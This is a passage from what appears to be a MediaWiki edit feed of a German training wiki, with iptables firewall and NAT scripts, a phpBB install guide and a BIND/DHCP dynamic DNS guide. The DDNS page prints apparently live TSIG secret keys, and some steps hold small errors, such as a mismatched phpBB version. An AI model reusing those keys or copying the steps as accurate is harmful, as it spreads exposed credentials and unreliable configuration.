 iptables -A OUTPUT -o eth0 -p udp -d 192.168.240.21 --dport 53 -m state --state NEW -j ACCEPT&lt;br /&gt;
 iptables -A OUTPUT -o eth0 -p tcp --dport 80 -m state --state NEW -j ACCEPT&lt;br /&gt;
 iptables -A INPUT -i eth0 -p icmp --icmp-type 8 -j ACCEPT&lt;br /&gt;
 iptables -t nat -A POSTROUTING -j MASQUERADE -o eth0 -s 172.23.242.0/24&lt;br /&gt;
 '''iptables -t nat -A PREROUTING -j DNAT -i eth0 -p tcp --dport 3333 --to-dest 172.23.242.100:22'''&lt;br /&gt;
 ;;&lt;br /&gt;
 stop)&lt;br /&gt;
 echo &amp;quot;stoppe firewall&amp;quot;&lt;br /&gt;
 iptables -F&lt;br /&gt;
 iptables -F -t nat&lt;br /&gt;
 iptables -P INPUT ACCEPT&lt;br /&gt;
 iptables -P OUTPUT ACCEPT&lt;br /&gt;
 iptables -P FORWARD ACCEPT&lt;br /&gt;
 ;;&lt;br /&gt;
 esac&lt;br /&gt;
&lt;br /&gt;
;Verwendete Syntax&lt;br /&gt;
:''' PREROUTING''': Die Aktion soll noch vor einer Routingentscheidung durchgeführt werden&lt;br /&gt;
&lt;br /&gt;
====DNAT für alle Protokolle/Ports - one IP====&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
 iptables -t nat -A PREROUTING -d $1stIP -j DNAT --to-destination $2ndIP&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Alle Pakete die an die Adresse $1stIP gehen werden an die Adresse $2nIP umgeleitet&lt;br /&gt;
&lt;br /&gt;
====DNAT auf einen Port====&lt;br /&gt;
&lt;br /&gt;
 iptables -t nat -A PREROUTING -p tcp -d $1stIP --dport $EINGANGSPORT -j DNAT --to-destination $2ndIP&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Alle Pakete die an den Port $EINGANGSPORT der Adresse $1stIP gehen werden an die Adresse $2nIP umgeleitet&lt;br /&gt;
&lt;br /&gt;
====DNAT Portumleitung====&lt;br /&gt;
&lt;br /&gt;
 iptables -t nat -A PREROUTING -p tcp -d $1stIP --dport $EINGANGSPORT -j DNAT --to-destination $2ndIP:$WUNSCHPORT&lt;br /&gt;
&lt;br /&gt;
Alle Pakete die an den Port $EINGANGSPORT der Adresse $1stIP gehen werden an den Port $WUNSCHPORT der Adresse $2nIP umgeleitet &lt;br /&gt;
&lt;br /&gt;
 (Wenn die Destination IP der Host ist, reicht die Schnittstellenangabe!&lt;br /&gt;
 iptables -t nat -A PREROUTING -p tcp -i $WANDEV --dport $EINGANGSPORT -j DNAT --to-destination $2ndIP:$WUNSCHPORT&lt;br /&gt;
&lt;br /&gt;
====FORWARD====&lt;br /&gt;
 &lt;br /&gt;
 iptables -t nat -A PREROUTING -j DNAT -i $WAN -p tcp --dport $EINGANGSPORT --to $2ndIP:$WUNSCHPORT&lt;br /&gt;
 iptables -A FORWARD -p tcp -d $2ndIP --dport  $WUNSCHPORT -j ACCEPT -m state --state NEW&lt;br /&gt;
&lt;br /&gt;
==== FULL NAT ====&lt;br /&gt;
 iptables -t nat -A PREROUTING -d $1stIP -j DNAT --to-destination $2ndIP&lt;br /&gt;
 iptables -t nat -A POSTROUTING -s $2ndIP -j SNAT --to-source $1stIP&lt;br /&gt;
      &lt;br /&gt;
&lt;br /&gt;
;Verwendete Syntax&lt;br /&gt;
:'''PREROUTING''': Paket wird nach der Routingentscheidung geändert&lt;br /&gt;
:'''-j DNAT''': Aktion die auf Pakete ausgeführt wird, hier DNAT&lt;br /&gt;
:'''--to-dest 172.23.242.100:22''': IP-Adresse und Port zu denen weitergeleitet wird&lt;br /&gt;
:In einem Satz:&lt;br /&gt;
:Ändere bei allen Paketen die auf eth0 ankommen und den Port 3333 ansprechen die Ziel Adresse zu 172.23.242.100 und Port zu 22&lt;br /&gt;
&lt;br /&gt;
==Logging==&lt;br /&gt;
&lt;br /&gt;
Damit wir sehen können was so alles an unserer Firewall abprallt, nicht nur um Störenfriede zu erkennen, sondern auch um zu sehen was wir vielleicht für uns freischalten müssen, können wir ein logging einrichten das automatisch alle Pakete die nicht durchgelassen wurden an den syslog deamon weitergeben der die Vorkommnisse in die syslog schreibt.&lt;br /&gt;
 #!/bin/bash&lt;br /&gt;
 case $1 in&lt;br /&gt;
 start)&lt;br /&gt;
 echo &amp;quot;starte firewall&amp;quot;&lt;br /&gt;
 iptables -F&lt;br /&gt;
 iptables -F -t nat&lt;br /&gt;
 iptables -P INPUT DROP&lt;br /&gt;
 iptables -P OUTPUT DROP&lt;br /&gt;
 iptables -P FORWARD DROP&lt;br /&gt;
 iptables -A INPUT -m state --state ESTABLISHED,RELATED -j ACCEPT&lt;br /&gt;
 iptables -A FORWARD -m state --state ESTABLISHED,RELATED -j ACCEPT&lt;br /&gt;
 iptables -A OUTPUT -m state --state ESTABLISHED,RELATED -j ACCEPT&lt;br /&gt;
 iptables -A OUTPUT -o lo -j ACCEPT&lt;br /&gt;
 iptables -A INPUT -i lo -j ACCEPT&lt;br /&gt;
 iptables -A INPUT -i eth0 -s 192.168.241.10 -p tcp --dport 22 -m state --state NEW -j ACCEPT&lt;br /&gt;
 iptables -A OUTPUT -o eth0 -p tcp -d 192.168.240.21 --dport 53 -m state --state NEW -j ACCEPT&lt;br /&gt;
 iptables -A OUTPUT -o eth0 -p udp -d 192.168.240.21 --dport 53 -m state --state NEW -j ACCEPT&lt;br /&gt;
 iptables -A OUTPUT -o eth0 -p tcp --dport 80 -m state --state NEW -j ACCEPT&lt;br /&gt;
 iptables -A INPUT -i eth0 -p icmp --icmp-type 8 -j ACCEPT&lt;br /&gt;
 iptables -t nat -A POSTROUTING -j MASQUERADE -o eth0 -s 172.23.242.0/24&lt;br /&gt;
 iptables -t nat -A PREROUTING -j DNAT -i eth0 --dport 3333 --to-dest 172.23.242.100:22&lt;br /&gt;
 '''iptables -A INPUT  -j LOG  --log-prefix &amp;quot;--iptables-in--&amp;quot;'''&lt;br /&gt;
 '''iptables -A OUTPUT -j LOG  --log-prefix &amp;quot;--iptables-out--&amp;quot;'''&lt;br /&gt;
 '''iptables -A FORWARD -j LOG --log-prefix &amp;quot;--iptables-for--&amp;quot;'''&lt;br /&gt;
 ;;&lt;br /&gt;
 stop)&lt;br /&gt;
 echo &amp;quot;stoppe firewall&amp;quot;&lt;br /&gt;
 iptables -F&lt;br /&gt;
 iptables -F -t nat&lt;br /&gt;
 iptables -P INPUT ACCEPT&lt;br /&gt;
 iptables -P OUTPUT ACCEPT&lt;br /&gt;
 iptables -P FORWARD ACCEPT&lt;br /&gt;
 ;;&lt;br /&gt;
 esac&lt;br /&gt;
Diese Zeilen sollten ganz am Ende bleiben, damit auch sichergestellt ist das nur Pakete die alle Regeln durchlaufen haben dort landen.&lt;br /&gt;
&lt;br /&gt;
;Verwendete Syntax&lt;br /&gt;
:'''-j LOG''': Aktion die auf Pakete ausgeführt wird, hier LOG&lt;br /&gt;
:'''--log-prefix &amp;quot;--iptables-in--&amp;quot;''': Schreibt ''--iptables-in--'' , vor jedes Paket das am INPUT verworfen wurde,&lt;br /&gt;
==logging file ändern==&lt;br /&gt;
*[[Rsyslog]]&lt;br /&gt;
&lt;br /&gt;
=netstat-nat and conntrack=&lt;br /&gt;
*[[netstat-nat]] (vielleicht veraltet)&lt;br /&gt;
*[[conntrack]]&lt;br /&gt;
==contrack table löschen== &lt;br /&gt;
*conntrack -F&lt;br /&gt;
&lt;br /&gt;
=DNAT weiterleitung bis auf einen port=&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
 #!/bin/bash&lt;br /&gt;
 SSHPORT=&amp;quot;4567&amp;quot;&lt;br /&gt;
 1stIP=&amp;quot;WEITERLEITUNGS-IP&amp;quot;&lt;br /&gt;
 2ndIP=&amp;quot;CONNECT-IP&amp;quot;&lt;br /&gt;
 case $1 in&lt;br /&gt;
 start)&lt;br /&gt;
 echo &amp;quot;starte firewall&amp;quot;&lt;br /&gt;
 iptables -F&lt;br /&gt;
 iptables -F -t nat&lt;br /&gt;
 iptables -F -t mangle&lt;br /&gt;
 iptables -X&lt;br /&gt;
 iptables -X -t nat&lt;br /&gt;
 iptables -X -t mangle&lt;br /&gt;
 iptables -t nat -N innat&lt;br /&gt;
 iptables -t nat -A innat -j RETURN -p tcp --dport $SSHPORT&lt;br /&gt;
 iptables -t nat -A innat -j DNAT --to $1stIP&lt;br /&gt;
 iptables -t nat -A PREROUTING -d $2ndIP -j innat&lt;br /&gt;
 iptables -t nat -A POSTROUTING -j SNAT -s $1stIP --to $2ndIP&lt;br /&gt;
 ;;&lt;br /&gt;
 stop)&lt;br /&gt;
 echo &amp;quot;stoppe firewall&amp;quot;&lt;br /&gt;
 iptables -F&lt;br /&gt;
 iptables -F -t nat&lt;br /&gt;
 iptables -F -t mangle&lt;br /&gt;
 iptables -X&lt;br /&gt;
 iptables -X -t nat&lt;br /&gt;
 iptables -X -t mangle&lt;br /&gt;
 ;;&lt;br /&gt;
 esac&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
;Verwendete Syntax&lt;br /&gt;
:'''-N innat''': Hier wird eine neue Kette mit dem Namen &amp;quot;innat&amp;quot; angelegt&lt;br /&gt;
&lt;br /&gt;
=mark=&lt;br /&gt;
&lt;br /&gt;
 iptables -t mangle -A PREROUTING -j MARK -p tcp --dport 25 --set-mark 9&lt;br /&gt;
 iptables -t nat -A PREROUTING -j REDIRECT -p tcp --dport 25 --to 52525&lt;br /&gt;
 iptables -A INPUT -j ACCEPT -m mark --mark 9&lt;br /&gt;
&lt;br /&gt;
Alle ankommenden Pakete, die den angegebenen Bedingungen entsprechen (hier: TCP-Pakete mit Zielport 25) werden markiert. Es sind bis zu 32 verschiedene Markierungen möglich.&lt;br /&gt;
&lt;br /&gt;
Anhand dieser Markierungen können die Pakete nun, wie in unserem Beispiel auf einen anderen Port (52525) umgeleitet werden, ohne, dass dieser Port nach aussen geöffnet werden muss.&lt;br /&gt;
&lt;br /&gt;
Weiterhin werden im obigen Beispiel alle eingehenden Pakete, die den Marker 9 targen automatisch von der Firewall durchgelassen.&lt;br /&gt;
&lt;br /&gt;
=Mangle=&lt;br /&gt;
==MSS Reduktion==&lt;br /&gt;
 iptables -t mangle -A FORWARD -p tcp -i $LAN -o $WAN --tcp-flags SYN,RST SYN -j TCPMSS --set-mss 1400&lt;br /&gt;
*https://www.zeitgeist.se/2013/11/26/mtu-woes-in-ipsec-tunnels-how-to-fix/&lt;br /&gt;
&lt;br /&gt;
==Markieren und Freischalten==&lt;br /&gt;
 iptables -t mangle  -A PREROUTING -j MARK -i $WAN -p tcp --dport 22 -d $TELIP --set-mark 0x8&lt;br /&gt;
 iptables -t nat    -A PREROUTING -j DNAT -i $WAN -p tcp --dport 22 -d $TELIP --to 192.168.244.1:8472&lt;br /&gt;
 iptables -t filter -A FORWARD -j ACCEPT -m mark --mark 0x8&lt;br /&gt;
&lt;br /&gt;
=VPN Tunnel zulassen=&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Über den switch policy ist es möglich alle Pakete, die zu einem bestimmten VPN-Tunnel gehören durch die Firewall zu lassen.&lt;br /&gt;
&lt;br /&gt;
==ACHTUNG!==&lt;br /&gt;
&lt;br /&gt;
Dies funktioniert nicht, wenn der Tunnel genattet wird!&lt;br /&gt;
&lt;br /&gt;
==Ein VPN-Tunnel==&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
 iptables -A FORWARD -i $LAN -o $WAN -s $LEFTNET -d $RIGHTNET -m policy --dir out --pol ipsec -m state --state NEW -j ACCEPT  &lt;br /&gt;
&lt;br /&gt;
 iptables -A FORWARD -i $WAN -o $LAN -s $RIGHTNET -d $LEFTNET -m policy --dir in  --pol ipsec -m state --state NEW -j ACCEPT &lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
;Verwendete Syntax&lt;br /&gt;
:'''$LAN''': Bezeichnet die dem Netzwerk zugewandte Schnittstelle&lt;br /&gt;
:'''$WAN''': Bezeichnet die dem Internet zugewandte Schnittstelle&lt;br /&gt;
:'''$LEFTNET''': Bezeichnet das auf unserer Seite hinter der Firewall liegende Netzwerk&lt;br /&gt;
:'''$RIGHTNET''': Bezeichnet das auf der anderen Seite des VPN-Tunnels liegende Netzwerk&lt;br /&gt;
:'''-m policy''': Ruft das Modul &amp;quot;policy&amp;quot; auf&lt;br /&gt;
:'''--pol ipsec''': Bezeichnet die zu betrachtende policy. Hier IPSEC&lt;br /&gt;
:'''--dir in/out''': Legt die Richtung fest in welcher Richtung die policy betrachtet werden soll&lt;br /&gt;
&lt;br /&gt;
 iptables -A INPUT -i eth0 -p esp  -m state --state NEW -j ACCEPT&lt;br /&gt;
&lt;br /&gt;
ESP-Protokoll zulassen&lt;br /&gt;
&lt;br /&gt;
==Mehrere VPN-Tunnel==&lt;br /&gt;
&lt;br /&gt;
Wenn wir auf unserer Firewall mehrere Tunnel haben, die wir entsprechend filtern wollen, bietet es sich an eine neue Kette zu erstellen. Das Ergebnis ist zwar in beiden Fällen das Gleiche aber durch die Kette wird unsere Firewall übersichtlicher und wir sparen uns auch einiges an Schreibarbeit.&lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
iptables -N vpn-in-accept&lt;br /&gt;
iptables -A vpn-in-accept  -m policy --dir in  --pol ipsec -m state --state NEW -j ACCEPT&lt;br /&gt;
iptables -A vpn-in-accept -j RETURN&lt;br /&gt;
iptables -N vpn-out-accept&lt;br /&gt;
iptables -A vpn-out-accept -m policy --dir out --pol ipsec -m state --state NEW -j ACCEPT&lt;br /&gt;
iptables -A vpn-out-accept -j RETURN&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Und nun wenden wir die neue Kette an&lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
iptables -A FORWARD -i $LAN -o $WAN -s $LEFTNET -d $RIGHTNET -j vpn-out-accept&lt;br /&gt;
iptables -A FORWARD -i $WAN -o $LAN -s $RIGHTNET -d $LEFTNET -j vpn-in-accept&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
==Alle Pakete von einem VPN-Tunnel zulassen==&lt;br /&gt;
&lt;br /&gt;
Hier werden alle Pakete die von dem VPN Tunnel kommen zugelassen.&lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
iptables -A FORWARD -i $WAN  -m policy --pol ipsec --mode tunnel --dir in -j ACCEPT&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=limit module=&lt;br /&gt;
&lt;br /&gt;
==modul laden==&lt;br /&gt;
in jeder regel in der wir limits benutzen wollen müssen wir das modul laden&lt;br /&gt;
 -m limit&lt;br /&gt;
==optionen ==&lt;br /&gt;
*iptables -A INPUT  -p icmp -m icmp -m limit --limit 4/second --limit-burst 10 -j ACCEPT&lt;br /&gt;
&lt;br /&gt;
Das bedeutet folgendes:&lt;br /&gt;
&lt;br /&gt;
#Es dürfen 4 Pakete pro Sekunde durchgelassen werden.&lt;br /&gt;
#Wenn mehr als 4 Pakete pro Sekunde kommen, dürfen insgesamt 10 Pakete ohne Limitierung durch.&lt;br /&gt;
#Nach diesen 10 Paketen, dürfen wieder nur 4 pro Sekunde durch.&lt;br /&gt;
#Wenn weniger als 4 Pakete pro Sekunde ankommen, wird die Differenz wieder frei (limit von 4-X Pakete/s) und steht wieder zum überziehen bereit.   &lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
--limit&lt;br /&gt;
als Begrenzung optionen kann man definieren wie viele aktionen pro zeiteinheit zugelassen werden &lt;br /&gt;
1/second,2/minute,3/hour,4/day, oder 1/s,2m/,3/h,4/d&lt;br /&gt;
–limit-burst&lt;br /&gt;
definiert wie viele aktionen mehr als die limitierung zugelassen werden bevor das definierte limit einsetzt&lt;br /&gt;
&lt;br /&gt;
diese regel lässt bis zu 10 Verbindungen in einer Sekunde zu wird dies überschritten setzt die Limitierung von 4 ICMP Packeten pro Sekunden ein.&lt;br /&gt;
Für jede Sekunde in der das Limit von 4 packeten nicht erreicht wird werden die übrigen erlaubten pakete dem burst wider gut geschrieben &lt;br /&gt;
das heißt wen der burst voll ist dauert es 2,5 sekunden (ohne das icmp packete kommen) bis der burst wider seinen Ursprungswert ereicht oder 5 sekunden in denen pro sekunden 2 packete kommen&lt;br /&gt;
&lt;br /&gt;
==DoS atacken==&lt;br /&gt;
Beschränkt die Anzahl der neuen tcp Verbindungen die wir aufbauen können auf 1 pro Sekunde&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
*iptables -A INPUT -p icmp -m icmp --icmp-type address-mask-request -j DROP&lt;br /&gt;
*iptables -A INPUT -p icmp -m icmp --icmp-type timestamp-request -j DROP&lt;br /&gt;
*iptables -A INPUT -p icmp -m icmp -m limit --limit 1/second -j ACCEPT&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
=ftp=&lt;br /&gt;
==Vorrausetzung==&lt;br /&gt;
*iptables -A FORWARD -m state --state ESTABLISHED,RELATED -j ACCEPT&lt;br /&gt;
&lt;br /&gt;
Basically newer kernels ( &amp;gt;= 4.7 ) are deprecating the automatic helper module's port assignment in favor of explicit rules.&lt;br /&gt;
&lt;br /&gt;
Short fix to get the old behaviour:&lt;br /&gt;
&lt;br /&gt;
*echo 1 &amp;gt; /proc/sys/net/netfilter/nf_conntrack_helper&lt;br /&gt;
&lt;br /&gt;
Sowohl aktives als auch passives FTP wird nach laden der Module über den RELATED Status gehandled.&lt;br /&gt;
Module laden&lt;br /&gt;
*modprobe -v nf_conntrack_ftp&lt;br /&gt;
*modprobe -v nf_nat_ftp&lt;br /&gt;
&lt;br /&gt;
==Client auf Server im Internet==&lt;br /&gt;
*iptables -A FORWARD -i $LAN -o $WAN -p tcp --dport 21 -m state --state NEW -j ACCEPT&lt;br /&gt;
&lt;br /&gt;
==FTP Server im LAN mit Inside NAT==&lt;br /&gt;
&lt;br /&gt;
*iptables -A FORWARD -i $WAN -o $LAN -p tcp --dport 21 -d $FTPSERVER_LAN  -m state --state NEW -j ACCEPT&lt;br /&gt;
*iptables -t nat -A PREROUTING -j DNAT -i $WAN -p tcp --dport 21 --to-dest $FTPSERVER_LAN&lt;/div&gt;</summary>
		<author><name>Joshua.schreiner</name></author>
	</entry>
	<entry>
		<id>https://wiki.ixheim.de/index.php?title=Phpbb&amp;diff=18630</id>
		<title>Phpbb</title>
		<link rel="alternate" type="text/html" href="https://wiki.ixheim.de/index.php?title=Phpbb&amp;diff=18630"/>
		<updated>2019-10-09T09:23:01Z</updated>

		<summary type="html">&lt;p&gt;Joshua.schreiner: Die Seite wurde neu angelegt: „ == phpBB ==  um eine Forum mit phpBB zu erstellen benötigt man als Grundlagen einen Server mit apache oder einem andern Webserver genau so wie mysql und eine…“&lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;&lt;br /&gt;
== phpBB ==&lt;br /&gt;
&lt;br /&gt;
um eine Forum mit phpBB zu erstellen benötigt man als Grundlagen einen Server mit apache oder einem andern Webserver genau so wie mysql und eine erstellte Datenbank so wie einen Benutzer ebnfalls wird php7 benötigt so wie folgende Module&lt;br /&gt;
&lt;br /&gt;
 apt-get install php7.0 php7.0-mysql php7.0-curl php7.0-json php7.0-cgi libapache2-mod-php7.0 php7.0-mcrypt php7.0-xmlrpc php7.0-gd php7.0-mbstring php7.0  php7.0-common                  php7.0-xmlrpc php7.0-soap &lt;br /&gt;
  php7.0-xml php7.0-intl  php7.0-cli  php7.0-ldap php7.0-zip php7.0-readline php7.0-imap php7.0-tidy php7.0-recode php7.0-sq php7.0-intl&lt;br /&gt;
  &lt;br /&gt;
&lt;br /&gt;
wen dies vorhanden ist kann phpBB heruntergeladen werden &lt;br /&gt;
&lt;br /&gt;
 wget https://download.phpbb.com/pub/release/3.2/3.2.8/phpBB-3.2.8.zip  &lt;br /&gt;
 &lt;br /&gt;
danach endpacken wir die Datei &lt;br /&gt;
&lt;br /&gt;
 unzip phpBB-3.2.2.zip&lt;br /&gt;
 &lt;br /&gt;
die Datei wird dann zu HTML geschoben&lt;br /&gt;
&lt;br /&gt;
 mv phpBB3 /var/www/&lt;br /&gt;
 &lt;br /&gt;
und wechseln in dieses Verzeichnis &lt;br /&gt;
&lt;br /&gt;
 cd /var/www/&lt;br /&gt;
 &lt;br /&gt;
nun ändern wir den Besitzer und die rechte &lt;br /&gt;
&lt;br /&gt;
chown -R www-data.www-data phpBB3&lt;br /&gt;
&lt;br /&gt;
und so&lt;br /&gt;
&lt;br /&gt;
chmod -R 775 phpBB3&lt;br /&gt;
&lt;br /&gt;
jetzt wird ein local host für den phpbb erstellt in vim /etc/apache2/sites-available/phpbb.conf&lt;br /&gt;
&lt;br /&gt;
 &amp;lt;VirtualHost *:80&amp;gt; &lt;br /&gt;
 ServerName www.linuxhelp1.com&lt;br /&gt;
 DocumentRoot /var/www/phpBB3/&lt;br /&gt;
 &amp;lt;Directory /var/www/phpBB3/&amp;gt; &lt;br /&gt;
 AllowOverride All&lt;br /&gt;
 allow from all&lt;br /&gt;
 &amp;lt;/Directory&amp;gt; &lt;br /&gt;
 &amp;lt;/VirtualHost&amp;gt; &lt;br /&gt;
&lt;br /&gt;
nun aktivieren wir den Zugang&lt;br /&gt;
&lt;br /&gt;
 a2ensite phpbb.conf&lt;br /&gt;
&lt;br /&gt;
und deaktivieren den default Zugang&lt;br /&gt;
&lt;br /&gt;
 a2dissite 000-default.conf&lt;br /&gt;
&lt;br /&gt;
jetzt wird das rewrite module &lt;br /&gt;
&lt;br /&gt;
 a2enmod rewrite&lt;br /&gt;
&lt;br /&gt;
Restart apache &lt;br /&gt;
&lt;br /&gt;
 systemctl restart apache2&lt;br /&gt;
&lt;br /&gt;
nun kann die Installation des Forums über den Browser durchgeführt werden dafür muss man sich über die ip oder die Domain auf den Server verbinden.&lt;br /&gt;
die Installation an sich ist einfach gehalten auf der ersten Seite wird der Account des Admin erstellt  &lt;br /&gt;
auf der zweiten Seite wird die Datenbank eingetragen danach folgen noch ein paar Server Optionen und ein paar email configurationen &lt;br /&gt;
danach ist die Installation abgeschlossen&lt;/div&gt;</summary>
		<author><name>Joshua.schreiner</name></author>
	</entry>
	<entry>
		<id>https://wiki.ixheim.de/index.php?title=Grundlagen_der_boolesche_Algebra&amp;diff=18520</id>
		<title>Grundlagen der boolesche Algebra</title>
		<link rel="alternate" type="text/html" href="https://wiki.ixheim.de/index.php?title=Grundlagen_der_boolesche_Algebra&amp;diff=18520"/>
		<updated>2019-09-18T09:51:20Z</updated>

		<summary type="html">&lt;p&gt;Joshua.schreiner: Die Seite wurde geleert.&lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;&lt;/div&gt;</summary>
		<author><name>Joshua.schreiner</name></author>
	</entry>
	<entry>
		<id>https://wiki.ixheim.de/index.php?title=Grundlagen_der_boolesche_Algebra&amp;diff=18519</id>
		<title>Grundlagen der boolesche Algebra</title>
		<link rel="alternate" type="text/html" href="https://wiki.ixheim.de/index.php?title=Grundlagen_der_boolesche_Algebra&amp;diff=18519"/>
		<updated>2019-09-18T09:50:42Z</updated>

		<summary type="html">&lt;p&gt;Joshua.schreiner: Die Seite wurde neu angelegt: „Zu den grundlagen der booleschen Algebra gehören drei verschiedene arten      == ANO == Datei:file:///home/joshua.schreiner/Schreibtisch/Bildschirmfoto_2019…“&lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;Zu den grundlagen der booleschen Algebra gehören drei verschiedene arten &lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
== ANO ==&lt;br /&gt;
[[Datei:file:///home/joshua.schreiner/Schreibtisch/Bildschirmfoto_2019-09-18_11-41-20.png]]&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
== OR ==&lt;br /&gt;
[[Datei:file:///home/joshua.schreiner/Schreibtisch/Bildschirmfoto_2019-09-18_11-42-43.png]] &lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
== XOR ==&lt;br /&gt;
[[Datei:file:///home/joshua.schreiner/Schreibtisch/Bildschirmfoto_2019-09-18_11-43-42.png]]&lt;/div&gt;</summary>
		<author><name>Joshua.schreiner</name></author>
	</entry>
	<entry>
		<id>https://wiki.ixheim.de/index.php?title=Ddns_josh&amp;diff=18501</id>
		<title>Ddns josh</title>
		<link rel="alternate" type="text/html" href="https://wiki.ixheim.de/index.php?title=Ddns_josh&amp;diff=18501"/>
		<updated>2019-09-17T08:28:27Z</updated>

		<summary type="html">&lt;p&gt;Joshua.schreiner: &lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;'''DDNS'''&lt;br /&gt;
&lt;br /&gt;
um ein DDNS erstellen zu können muss zuerst ein Key erstellt werden dies geht mit&lt;br /&gt;
&lt;br /&gt;
 dnssec-keygen -a HMAC-MD5 -b 512 -n HOST example.com&lt;br /&gt;
&lt;br /&gt;
Es wurde die Datei example.com.+xxx+xxxxx.private. erstellt&lt;br /&gt;
&lt;br /&gt;
 &amp;gt;secret &amp;quot;&amp;quot;Private-key-format: v1.2&lt;br /&gt;
 &amp;gt;Algorithm: 157 (HMAC_MD5)&lt;br /&gt;
 &amp;gt;Key: testkey==&lt;br /&gt;
 &amp;gt;Bits: AAA=&lt;br /&gt;
&lt;br /&gt;
in der neu erstellten Datei steht unter Key: der erstellt Key&lt;br /&gt;
dieser muss nach named.conf.local kopiert werden hinter secret&lt;br /&gt;
&lt;br /&gt;
 key example.com {&lt;br /&gt;
  algorithm HMAC-MD5;&lt;br /&gt;
  secret &amp;quot;testkey==&amp;quot;;&lt;br /&gt;
 };&lt;br /&gt;
&lt;br /&gt;
Jezt werden noch in /etc/bind/named.conf.local die Zonen noch geändert&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
  &lt;br /&gt;
 &amp;gt;zone example.com {&lt;br /&gt;
         &amp;gt;type master;&lt;br /&gt;
         &amp;gt;file &amp;quot;example.com&amp;quot;;&lt;br /&gt;
         &amp;gt;allow-update {&lt;br /&gt;
         &amp;gt;key example.com ;&lt;br /&gt;
        &amp;gt;};&lt;br /&gt;
        &amp;gt;};&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
 &amp;gt;zone &amp;quot;100.80.10.in-addr.arpa&amp;quot; {&lt;br /&gt;
       &amp;gt;type master;&lt;br /&gt;
       &amp;gt;file &amp;quot;100.80.10.in-addr.arpa&amp;quot;;&lt;br /&gt;
       &amp;gt;allow-update {&lt;br /&gt;
       &amp;gt;key vulkan.int ;&lt;br /&gt;
        &amp;gt;};&lt;br /&gt;
&lt;br /&gt;
=Testen=&lt;br /&gt;
*nsupdate -v&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
&amp;gt; key vulkan.int mh8rQqaZF3rdGLJfRU7xvI6dHM6tGBJQwYvf6BfYvH+81N2aWhmxri4zuHzYCEguzyYkYRiI58N7lY7cqZ1qEg==&lt;br /&gt;
&amp;gt; server 10.80.100.10&lt;br /&gt;
&amp;gt; update delete schluri.vulkan.int&lt;br /&gt;
&amp;gt; update add schluri.vulkan.int 300 A 10.80.100.141     &lt;br /&gt;
&amp;gt; send&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
*STRG+D&lt;br /&gt;
&lt;br /&gt;
Der test mit einem Script &lt;br /&gt;
[[ddns basic]]&lt;br /&gt;
&lt;br /&gt;
nun werden noch ein paar sachen in der config des DHCP geändert &lt;br /&gt;
als erstes aktivieren wir die updates&lt;br /&gt;
&lt;br /&gt;
 &amp;gt; ddns-updates on;#&lt;br /&gt;
 &lt;br /&gt;
als nächstes kopieren wir den Key &lt;br /&gt;
 &lt;br /&gt;
  &amp;gt;key &amp;quot;ddns-key&amp;quot; {&lt;br /&gt;
  &amp;gt;algorithm HMAC-MD5;&lt;br /&gt;
  &amp;gt;secret &amp;quot;pAY61K6RuV0TPfd0fTBMhA==&amp;quot;;&lt;br /&gt;
 &amp;gt;};&lt;br /&gt;
&lt;br /&gt;
dazu muss der Key noch beiden Zonen zugewiesen werden &lt;br /&gt;
&lt;br /&gt;
  &amp;gt;zone cloud.net {&lt;br /&gt;
  &amp;gt;primary 127.0.0.1;&lt;br /&gt;
   &amp;gt;key &amp;quot;ddns-key&amp;quot;;&lt;br /&gt;
 &amp;gt;}&lt;br /&gt;
&lt;br /&gt;
 &amp;gt;zone 0.0.10.in-addr.arpa {&lt;br /&gt;
    &amp;gt;primary 127.0.0.1;&lt;br /&gt;
    &amp;gt;key &amp;quot;ddns-key&amp;quot;;&lt;br /&gt;
 &amp;gt;}&lt;br /&gt;
&lt;br /&gt;
nun werden die zugehörige Domainnamen ind diedhcpd.conf eingetragen &lt;br /&gt;
&lt;br /&gt;
 &amp;gt;subnet 10.80.100.0 netmask 255.255.255.0 {&lt;br /&gt;
                &amp;gt;range 10.80.100.101 10.80.100.150;&lt;br /&gt;
                &amp;gt;#ddns-domainname &amp;quot;vulkan.int&amp;quot;;&lt;br /&gt;
                &amp;gt;option domain-name-servers 10.80.100.10, 10.80.100.11;&lt;br /&gt;
                &amp;gt;option routers 10.80.100.1;&lt;br /&gt;
 &amp;gt;}&lt;/div&gt;</summary>
		<author><name>Joshua.schreiner</name></author>
	</entry>
	<entry>
		<id>https://wiki.ixheim.de/index.php?title=Ddns_josh&amp;diff=18495</id>
